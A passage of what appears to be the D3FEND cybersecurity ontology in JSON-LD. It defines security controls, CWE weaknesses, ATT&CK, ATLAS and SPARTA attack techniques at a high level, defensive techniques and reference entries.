      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization installs organization-defined security-relevant software updates automatically to organization-defined information system components.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:SoftwareUpdate"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-11T00:00:00"
      },
      "rdfs:label": "CCI-002613"
    },
    {
      "@id": "d3f:NetworkScanner",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A network scanner is a computer program used to retrieve usernames and info on groups, shares, and services of networked computers. This type of program scans networks for vulnerabilities in the security of that network. If there is a vulnerability with the security of the network, it will send a report back to a hacker who may use this info to exploit that network glitch to gain entry to the network or for other malicious activities. Ethical hackers often also use the information to remove the glitches and strengthen their network.",
      "d3f:monitors": {
        "@id": "d3f:Network"
      },
      "rdfs:isDefinedBy": {
        "@id": "https://dbpedia.org/page/Network_enumeration"
      },
      "rdfs:label": "Network Scanner",
      "rdfs:seeAlso": {
        "@id": "https://en.wikipedia.org/wiki/Network_enumeration#Software"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CyberSensor"
        },
        {
          "@id": "_:Ne11a35d691fc4975ac88f56856cdbc1d"
        }
      ],
      "skos:altLabel": "Network Enumerator"
    },
    {
      "@id": "_:Ne11a35d691fc4975ac88f56856cdbc1d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:monitors"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Network"
      }
    },
    {
      "@id": "d3f:CCI-002883_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system restricts the use of maintenance tools to authorized personnel only.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:UserAccountPermissions"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-22T00:00:00"
      },
      "rdfs:label": "CCI-002883"
    },
    {
      "@id": "d3f:Software",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:ExecutableFile"
      },
      "d3f:definition": "Computer software, or simply software, is that part of a computer system that consists of encoded information or computer instructions, in contrast to the physical hardware from which the system is built.",
      "d3f:implements": {
        "@id": "d3f:Subroutine"
      },
      "d3f:instructs": {
        "@id": "d3f:Process"
      },
      "rdfs:isDefinedBy": {
        "@id": "dbr:Software"
      },
      "rdfs:label": "Software",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalInformation"
        },
        {
          "@id": "_:Nf40ef92910c2430bbc057a0200d44028"
        },
        {
          "@id": "_:N43c7556db15349029ab71c88afe8f91e"
        },
        {
          "@id": "_:N51414aec72e04c07862ede7545ee2f78"
        }
      ]
    },
    {
      "@id": "_:Nf40ef92910c2430bbc057a0200d44028",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ExecutableFile"
      }
    },
    {
      "@id": "_:N43c7556db15349029ab71c88afe8f91e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:implements"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Subroutine"
      }
    },
    {
      "@id": "_:N51414aec72e04c07862ede7545ee2f78",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:instructs"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Process"
      }
    },
    {
      "@id": "d3f:NullPointerChecking",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3-NPC",
      "d3f:definition": "Checking if a pointer is NULL.",
      "d3f:hardens": [
        {
          "@id": "d3f:MemoryFreeFunction"
        },
        {
          "@id": "d3f:PointerDereferencingFunction"
        }
      ],
      "d3f:kb-article": "\n## How it Works\nProgrammatically checking if a pointer is NULL before use.\n\n## Considerations\n* Pointers should be checked prior to use after they have, or may have been modified.\n* Note that it may vary by circumstance whether the caller, or callee is responsible for checking if a pointer is NULL.\n* Note: This resource should not be considered a definitive or exhaustive coding guideline.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-NullPointerChecking_SEI"
        },
        {
          "@id": "d3f:Reference-NullPointerDereference_CWE"
        },
        {
          "@id": "d3f:Reference-PointerValidationFunction_SEI"
        }
      ],
      "d3f:synonym": "Nil Pointer Checking",
      "rdfs:label": "Null Pointer Checking",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PointerValidation"
        },
        {
          "@id": "_:N05721ec2ecad4761a77ff352849d59ba"
        },
        {
          "@id": "_:N10cae582e3304b049774edb22b0e5756"
        }
      ]
    },
    {
      "@id": "_:N05721ec2ecad4761a77ff352849d59ba",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:hardens"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MemoryFreeFunction"
      }
    },
    {
      "@id": "_:N10cae582e3304b049774edb22b0e5756",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:hardens"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PointerDereferencingFunction"
      }
    },
    {
      "@id": "d3f:CWE-454",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-454",
      "d3f:definition": "The product initializes critical internal variables or data stores using inputs that can be modified by untrusted actors.",
      "rdfs:label": "External Initialization of Trusted Variables or Data Stores",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-1419"
        },
        {
          "@id": "d3f:CWE-665"
        }
      ]
    },
    {
      "@id": "d3f:accesses",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x accesses y: The subject x takes the action of reading from, writing into, or executing the stored information in the object y. Reads, writes, and executes are specific cases of accesses.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/02673854-n"
      },
      "rdfs:label": "accesses",
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:associated-with"
        },
        {
          "@id": "d3f:may-access"
        }
      ]
    },
    {
      "@id": "d3f:AML.TA0007",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "d3f:attack-id": "AML.TA0007",
      "d3f:definition": "The adversary is trying to avoid being detected by AI-enabled security software.\n\nDefense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise.\nTechniques used for defense evasion include evading AI-enabled security software such as malware detectors.",
      "rdfs:label": "Defense Evasion - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/tactics/AML.TA0007"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATLASTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ],
      "skos:prefLabel": "Defense Evasion"
    },
    {
      "@id": "d3f:T1031",
      "@type": "owl:Class",
      "d3f:attack-id": "T1031",
      "d3f:definition": "Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Registry. Service configurations can be modified using utilities such as sc.exe and [Reg](https://attack.mitre.org/software/S0075).",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1543.003",
      "rdfs:label": "Modify Existing Service",
      "rdfs:seeAlso": {
        "@id": "d3f:T1543.003"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:PersistenceTechnique"
      }
    },
    {
      "@id": "d3f:T1603",
      "@type": "owl:Class",
      "d3f:attack-id": "T1603",
      "d3f:definition": "Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. On Android and iOS, APIs and libraries exist to facilitate scheduling tasks to execute at a specified date, time, or interval.",
      "rdfs:label": "Scheduled Task/Job - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileExecutionTechnique"
        },
        {
          "@id": "d3f:ATTACKMobilePersistenceTechnique"
        }
      ],
      "skos:prefLabel": "Scheduled Task/Job"
    },
    {
      "@id": "d3f:CWE-155",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-155",
      "d3f:definition": "The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as wildcards or matching symbols when they are sent to a downstream component.",
      "rdfs:label": "Improper Neutralization of Wildcards or Matching Symbols",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-138"
      }
    },
    {
      "@id": "d3f:PER-0002.01",
      "@type": "owl:Class",
      "d3f:attack-id": "PER-0002.01",
      "d3f:definition": "Hardware backdoors leverage properties of the physical design to provide durable, low-visibility reentry. Examples include enabled test/scan chains, manufacturing or boot-strap modes invoked by pins or registers, persistent debug interfaces (JTAG/SWD/UART), undocumented device commands, and logic inserted in FPGA/ASIC designs that activates under specific stimuli. Because these mechanisms sit below or beside flight software, they can grant direct access to buses, memories, or peripheral control even when higher layers appear healthy. Triggers may be electrical (pin states, voltage/clock sequences), protocol-level (special patterns on an instrument link), or environmental/temporal (particular temperature ranges, timing offsets). Once on orbit, such pathways are difficult to remove or reconfigure, allowing the attacker to persist by reusing the same physical entry points whenever conditions are met.",
      "rdfs:label": "Hardware Backdoor - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/PER-0002/01/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:PER-0002"
      },
      "skos:prefLabel": "Hardware Backdoor"
    },
    {
      "@id": "d3f:CWE-774",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-774",
      "d3f:definition": "The product allocates file descriptors or handles on behalf of an actor without imposing any restrictions on how many descriptors can be allocated, in violation of the intended security policy for that actor.",
      "d3f:synonym": "File Descriptor Exhaustion",
      "rdfs:label": "Allocation of File Descriptors or Handles Without Limits or Throttling",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-770"
      }
    },
    {
      "@id": "d3f:Reference-MGT516ManagingSecurityVulnerabilitiesEnterpriseAndCloud",
      "@type": [
        "owl:NamedIndividual",
        "d3f:InternetArticleReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.sans.org/cyber-security-courses/managing-enterprise-cloud-security-vulnerabilities/"
      },
      "d3f:kb-abstract": "Vulnerability, patch, and configuration management are not new security topics. In fact, they are some of the oldest security functions. Yet, we still struggle to manage these capabilities effectively. The quantity of outstanding vulnerabilities for most large organizations is overwhelming, and all organizations struggle to keep up with the never-ending onslaught of new vulnerabilities in their infrastructure and applications. When you add in the cloud and the increasing speed with which all organizations must deliver systems, applications, and features to both their internal and external customers, security may seem unachievable. This course will show you the most effective ways to mature your vulnerability management program and move from identifying vulnerabilities to successfully treating them. 16 Cyber42 and lab exercises",
      "d3f:kb-author": "Jonathan Risto and David Hazar",
      "d3f:kb-organization": "SANS",
      "d3f:kb-reference-of": {
        "@id": "d3f:OperationalRiskAssessment"
      },
      "d3f:kb-reference-title": "MGT516: Managing Security Vulnerabilities: Enterprise and Cloud",
      "rdfs:label": "Reference - MGT516: Managing Security Vulnerabilities: Enterprise and Cloud"
    },
    {
      "@id": "d3f:CCI-001493_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system protects audit tools from unauthorized access.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-29T00:00:00"
      },
      "rdfs:label": "CCI-001493"
    },
    {
      "@id": "d3f:REC-0003.04",
      "@type": "owl:Class",
      "d3f:attack-id": "REC-0003.04",
      "d3f:definition": "Adversaries seek any credential that would let them authenticate as a legitimate actor in space, ground, or supporting cloud networks. Targets include TT&C authentication keys and counters, link-encryption keys, PN codes or spreading sequences, modem and gateway accounts, mission control mission control user and service accounts, station control credentials, VPN and identity-provider tokens, SLE/CSP service credentials, maintenance backdoor accounts, and automation secrets embedded in scripts or CI/CD pipelines. Acquisition paths include spear-phishing, supply-chain compromise, credential reuse across dev/test/ops, logs and core dumps, misconfigured repositories, contractor laptops, and improperly sanitized training data. Because some missions authenticate uplink without encrypting it, possession of valid keys or counters may be sufficient to issue accepted commands from outside official channels.",
      "rdfs:label": "Valid Credentials - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/REC-0003/04/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:REC-0003"
      },
      "skos:prefLabel": "Valid Credentials"
    },
    {
      "@id": "d3f:CWE-118",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-118",
      "d3f:definition": "The product does not restrict or incorrectly restricts operations within the boundaries of a resource that is accessed using an index or pointer, such as memory or files.",
      "rdfs:label": "Incorrect Access of Indexable Resource ('Range Error')",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-664"
      }
    },
    {
      "@id": "d3f:PlatformUptime",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A variable that notes the amount of time a platform has been running since its last power cycle or reset.",
      "rdfs:comment": "In OT controllers this may not be a default tag rather something that should be defined using other system tags.",
      "rdfs:label": "Platform Uptime",
      "rdfs:subClassOf": {
        "@id": "d3f:SystemPlatformVariable"
      }
    },
    {
      "@id": "d3f:Software-definedRadioWaveformApplication",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A software implementation of a radio waveform that executes on the programmable processing elements of a software-defined radio and realizes the signal processing functions necessary to transmit and receive a specific radio signal. On peripheral SDRs, this can take the form of a compiled flowgraph that runs on the host PC, whereas in stand-alone SDRs it may be an FPGA bitstream or waveform package that executes on the SDR's processing elements.",
      "d3f:may-contain": {
        "@id": "d3f:FPGABitstream"
      },
      "d3f:synonym": [
        "SDR waveform",
        "Waveform Software"
      ],
      "rdfs:isDefinedBy": {
        "@id": "https://media.defense.gov/2020/Feb/13/2002249005/-1/-1/1/SCA_4.1_SCASPECIFICATION.PDF"
      },
      "rdfs:label": "Software-defined Radio Waveform Application",
      "rdfs:seeAlso": {
        "@id": "https://ieeexplore.ieee.org/document/5768314"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalSignalProcessingApplication"
        },
        {
          "@id": "_:N666864940d5547c8b6f878d214e1d665"
        }
      ]
    },
    {
      "@id": "_:N666864940d5547c8b6f878d214e1d665",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FPGABitstream"
      }
    },
    {
      "@id": "d3f:NetworkConnectionRefuseEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a network connection is refused.",
      "rdfs:label": "Network Connection Refuse Event",
      "rdfs:subClassOf": {
        "@id": "d3f:NetworkConnectionEvent"
      }
    },
    {
      "@id": "d3f:NonlinearRegression",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-NR",
      "d3f:definition": "Nonlinear regression is a form of regression analysis in which observational data are modeled by a function which is a nonlinear combination of the model parameters and depends on one or more independent variables.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Nonlinear regression. [Link](https://en.wikipedia.org/wiki/Nonlinear_regression)",
      "rdfs:label": "Nonlinear Regression",
      "rdfs:subClassOf": {
        "@id": "d3f:RegressionAnalysis"
      }
    },
    {
      "@id": "d3f:AML.T0090",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0090",
      "d3f:definition": "Adversaries may extract credentials from OS caches, application memory, or other sources on a compromised system. Credentials are often in the form of a hash or clear text, and can include usernames and passwords, application tokens, or other authentication keys.\n\nCredentials can be used to perform [Lateral Movement](/tactics/AML.TA0015) to access other AI services such as AI agents, LLMs, or AI inference APIs. Credentials could also give an adversary access to other software tools and data sources that are part of the AI DevOps lifecycle.",
      "rdfs:label": "OS Credential Dumping - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0090"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASCredentialAccessTechnique"
      },
      "skos:prefLabel": "OS Credential Dumping"
    },
    {
      "@id": "d3f:T1213.006",
      "@type": "owl:Class",
      "d3f:attack-id": "T1213.006",
      "d3f:definition": "Adversaries may leverage databases to mine valuable information. These databases may be hosted on-premises or in the cloud (both in platform-as-a-service and software-as-a-service environments).",
      "rdfs:label": "Databases",
      "rdfs:subClassOf": {
        "@id": "d3f:T1213"
      }
    },
    {
      "@id": "d3f:CWE-622",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-622",
      "d3f:definition": "The product adds hooks to user-accessible API functions, but it does not properly validate the arguments. This could lead to resultant vulnerabilities.",
      "rdfs:label": "Improper Validation of Function Hook Arguments",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-20"
      }
    },
    {
      "@id": "d3f:CWE-1042",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1042",
      "d3f:definition": "The code contains a member element that is declared as static (but not final), in which its parent class element is not a singleton class - that is, a class element that can be used only once in the 'to' association of a Create action.",
      "rdfs:label": "Static Member Data Element outside of a Singleton Class Element",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1176"
      }
    },
    {
      "@id": "d3f:UserBehavior",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:UserAction"
      },
      "d3f:definition": "A user behavior is a pattern of user actions, or set of such patterns. Modeling and analyzing these patterns and monitoring a users actions for meaningful anomalies is known as user behavior analytics (UBA).",
      "rdfs:label": "User Behavior",
      "rdfs:seeAlso": {
        "@id": "dbr:User_behavior_analytics"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalInformationBearer"
        },
        {
          "@id": "_:Nace89108311846bc8f6a723a5ed28550"
        }
      ]
    },
    {
      "@id": "_:Nace89108311846bc8f6a723a5ed28550",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserAction"
      }
    },
    {
      "@id": "d3f:TA0102",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "rdfs:label": "Discovery - ATTACK ICS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKICSTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ],
      "skos:prefLabel": "Discovery"
    },
    {
      "@id": "d3f:T1218.003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1218.003",
      "d3f:definition": "Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.",
      "d3f:invokes": {
        "@id": "d3f:CreateProcess"
      },
      "d3f:may-produce": {
        "@id": "d3f:NetworkTraffic"
      },
      "rdfs:label": "CMSTP",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1218"
        },
        {
          "@id": "_:Neead9b2285a245e6934ccecb3fd45721"
        },
        {
          "@id": "_:Na7ac9a24cc0a42de9a0b76210b545c3e"
        }
      ]
    },
    {
      "@id": "_:Neead9b2285a245e6934ccecb3fd45721",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CreateProcess"
      }
    },
    {
      "@id": "_:Na7ac9a24cc0a42de9a0b76210b545c3e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-produce"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkTraffic"
      }
    },
    {
      "@id": "d3f:CWE-1239",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1239",
      "d3f:definition": "The hardware product does not properly clear sensitive information from built-in registers when the user of the hardware block changes.",
      "rdfs:label": "Improper Zeroization of Hardware Register",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-226"
      }
    },
    {
      "@id": "d3f:CWE-447",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-447",
      "d3f:definition": "A UI function for a security feature appears to be supported and gives feedback to the user that suggests that it is supported, but the underlying functionality is not implemented.",
      "rdfs:label": "Unimplemented or Unsupported Feature in UI",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-446"
        },
        {
          "@id": "d3f:CWE-671"
        }
      ]
    },
    {
      "@id": "d3f:CWE-39",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-39",
      "d3f:definition": "The product accepts input that contains a drive letter or Windows volume letter ('C:dirname') that potentially redirects access to an unintended location or arbitrary file.",
      "rdfs:label": "Path Traversal: 'C:dirname'",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-36"
      }
    },
    {
      "@id": "d3f:T1557",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1557",
      "d3f:definition": "Adversaries may attempt to position themselves between two or more networked devices using an adversary-in-the-middle (AiTM) technique to support follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002), or replay attacks ([Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212)). By abusing features of common networking protocols that can determine the flow of network traffic (e.g. ARP, DNS, LLMNR, etc.), adversaries may force a device to communicate through an adversary controlled system so they can collect information or perform additional actions.(Citation: Rapid7 MiTM Basics)",
      "d3f:produces": {
        "@id": "d3f:NetworkTraffic"
      },
      "rdfs:label": "Adversary-in-the-Middle",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CollectionTechnique"
        },
        {
          "@id": "d3f:CredentialAccessTechnique"
        },
        {
          "@id": "_:N7ffa6da5d0c7440eaa11d0e8ba22654e"
        }
      ]
    },
    {
      "@id": "_:N7ffa6da5d0c7440eaa11d0e8ba22654e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkTraffic"
      }
    },
    {
      "@id": "d3f:CWE-113",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-113",
      "d3f:definition": "The product receives data from an HTTP agent/component (e.g., web server, proxy, browser, etc.), but it does not neutralize or incorrectly neutralizes CR and LF characters before the data is included in outgoing HTTP headers.",
      "d3f:synonym": [
        "HTTP Request Splitting",
        "HTTP Response Splitting"
      ],
      "rdfs:label": "Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting')",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-436"
        },
        {
          "@id": "d3f:CWE-93"
        }
      ]
    },
    {
      "@id": "d3f:Reference-FirewallForInterentAccess_SecureComputingLLC",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/GB2317539A"
      },
      "d3f:kb-abstract": "Regulating the flow of internetwork connections through a firewall (10) having a network protocol stack (14,16,18) which includes an Internet Protocol (IP) layer (16). A determination is made of the parameters characteristic of a connection request, including a netelement parameter characteristic of where the connection request came from. A query is generated and a determination is made whether there is a rule corresponding to that query. If there is a rule corresponding to the query, a determination is made whether authentication is required by the rule. If authentication is required by the rule, an authentication protocol is activated and the connection is activated if the authentication protocol is completed successfully.",
      "d3f:kb-author": "Edward B Stockwell, Alan E Klietz",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Secure Computing LLC",
      "d3f:kb-reference-of": {
        "@id": "d3f:InboundTrafficFiltering"
      },
      "d3f:kb-reference-title": "Firewall for interent access",
      "rdfs:label": "Reference - Firewall for interent access - Secure Computing LLC"
    },
    {
      "@id": "d3f:isolates",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x isolates y: The technique or agent x sets digital artifact y apart from other digital artifacts, sequestering y.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/00496744-v"
      },
      "rdfs:label": "isolates",
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:associated-with"
        },
        {
          "@id": "d3f:d3fend-tactical-verb-property"
        }
      ]
    },
    {
      "@id": "d3f:Reference-IEEE-802_1AB-2016",
      "@type": [
        "owl:NamedIndividual",
        "d3f:SpecificationReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://standards.ieee.org/ieee/802.1AB/6047/"
      },
      "d3f:kb-organization": "IEEE",
      "d3f:kb-reference-of": {
        "@id": "d3f:HardwareComponentInventory"
      },
      "d3f:kb-reference-title": "IEEE Standard for Local and Metropolitan Area Networks - Station and Media Access Control Connectivity Discovery",
      "rdfs:label": "Reference - IEEE Standard for Local and Metropolitan Area Networks - Station and Media Access Control Connectivity Discovery"
    },
    {
      "@id": "d3f:Reference-CAR-2021-04-001%3ACommonWindowsProcessMasquerading_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2021-04-001/"
      },
      "d3f:kb-abstract": "Masquerading (T1036) is defined by ATT&CK as follows:\n\n“Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.”\n\nMalware authors often use this technique to hide malicious executables behind legitimate Windows executable names (e.g. lsass.exe, svchost.exe, etc).\n\nThere are several sub-techniques, but this analytic focuses on Match Legitimate Name or Location only.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2021-04-001: Common Windows Process Masquerading",
      "rdfs:label": "Reference - CAR-2021-04-001: Common Windows Process Masquerading - MITRE"
    },
    {
      "@id": "d3f:HardwareDeviceStateEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event involving a change to a device's state, such as connection, disconnection, modification, or operational state transitions (e.g., online or offline). Device state events provide visibility into device availability and operational conditions.",
      "rdfs:label": "Hardware Device State Event",
      "rdfs:subClassOf": {
        "@id": "d3f:HardwareDeviceEvent"
      }
    },
    {
      "@id": "d3f:AsymmetricKey",
      "@type": "owl:Class",
      "d3f:definition": "Asymmetric keys are public and private keys, paired such that asymmetric (public-key) cryptography algorithms can be implemented using them. Public-key cryptography, or asymmetric cryptography, is any cryptographic system that uses pairs of keys: public keys that may be disseminated widely paired with private keys which are known only to the owner. There are two functions that can be achieved: using a public key to authenticate that a message originated with a holder of the paired private key; or encrypting a message with a public key to ensure that only the holder of the paired private key can decrypt it.",
      "rdfs:label": "Asymmetric Key",
      "rdfs:seeAlso": {
        "@id": "dbr:Public-key_cryptography"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:CryptographicKey"
      }
    },
    {
      "@id": "d3f:Reference-CAR-2021-01-006%3AUnusualChildProcessSpawnedUsingDDEExploit_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2021-01-006/"
      },
      "d3f:kb-abstract": "Adversaries may use Windows Dynamic Data Exchange (DDE) to execute arbitrary commands. DDE is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2021-01-006: Unusual Child Process spawned using DDE exploit",
      "rdfs:label": "Reference - CAR-2021-01-006: Unusual Child Process spawned using DDE exploit - MITRE"
    },
    {
      "@id": "d3f:CWE-588",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-588",
      "d3f:definition": "Casting a non-structure type to a structure type and accessing a field can lead to memory access errors or data corruption.",
      "rdfs:label": "Attempt to Access Child of a Non-structure Pointer",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-704"
        },
        {
          "@id": "d3f:CWE-758"
        }
      ]
    },
    {
      "@id": "d3f:T1572",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1572",
      "d3f:definition": "Adversaries may tunnel network communications to and from a victim system within a separate protocol to avoid detection/network filtering and/or enable access to otherwise unreachable systems. Tunneling involves explicitly encapsulating a protocol within another. This behavior may conceal malicious traffic by blending in with existing traffic and/or provide an outer layer of encryption (similar to a VPN). Tunneling could also enable routing of network packets that would otherwise not reach their intended destination, such as SMB, RDP, or other traffic that would be filtered by network appliances or not routed over the Internet.",
      "d3f:produces": {
        "@id": "d3f:OutboundInternetNetworkTraffic"
      },
      "rdfs:label": "Protocol Tunneling",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CommandAndControlTechnique"
        },
        {
          "@id": "_:N36212f17bc0e4a37b98553419f111838"
        }
      ]
    },
    {
      "@id": "_:N36212f17bc0e4a37b98553419f111838",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OutboundInternetNetworkTraffic"
      }
    },
    {
      "@id": "d3f:WideAreaNetwork",
      "@type": "owl:Class",
      "d3f:definition": "By contrast to a local area network (LAN), a wide area network (WAN), not only covers a larger geographic distance, but also generally involves leased telecommunication circuits or Internet links.",
